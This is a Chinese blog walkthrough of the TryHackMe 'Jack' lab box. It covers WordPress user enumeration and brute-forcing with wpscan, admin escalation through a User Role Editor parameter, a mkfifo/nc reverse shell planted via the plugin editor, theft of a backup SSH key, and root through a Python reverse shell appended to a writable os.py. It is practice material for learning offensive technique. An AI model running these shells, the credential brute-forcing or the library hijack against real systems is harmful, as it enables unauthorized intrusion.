扫描打点


没扫到什么有价值的
80扫出来有
/admin,看一下是wp的站:
1
wpscan --url http://jack.thm -e u
扫出来三个人
jackwendydanny再爆破一下:
1
wpscan --url http://jack.thm/wp-login.php -U user.txt -P /usr/share/wordlists/fasttrack.txt
令人感慨的是
rockyou.txt里面没有这个密码爆出来账密
wendy:changelater
wordpress拿rce进去后右下角看到版本
5.3.2但这个内核没洞,看提示说的是
ure_other_roles,查了一下ure是wp的插件User Role Editor,有一个用户提权的洞根据描述是去
profile.php点upadte profile,在POST请求里面加上ure_other_roles参数,值为administrator看到提到
admin了:
看到可以修改插件内容,在
plugin editor里面随便改一个反弹shell
1
mkfifo /tmp/f;nc 10.0.127.37 4444 < /tmp/f | /bin/bash > /tmp/f
var/backup备份横向在
jack的家目录找到第一个flag,以及提示:
那就是去
/var/backup找备份文件,看到id_rsa下下来登录:
横向到
jack,但没有密码执行不了sudo提权
看了一圈没什么,传个
pspy扫一下扫到

然后不让用路径劫持了:

偷看一下,发现这里可以更改
os.py。。。在
/usr/lib/python2.7/os.py手动加一段反弹
shell即可1
2
3
4
5
6
7
8echo 'import socket
import pty
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("10.10.127.37",8888))
dup2(s.fileno(),0)
dup2(s.fileno(),1)
dup2(s.fileno(),2)
pty.spawn("/bin/bash")'>>os.py
THM打靶日寄28-Jack
- 本文链接: http://noone40404.github.io/2024/11/22/THM打靶日寄28:Jack/
- 版权声明: 本博客所有文章除特别声明外,均采用 BY-NC-SA 许可协议。转载请注明出处!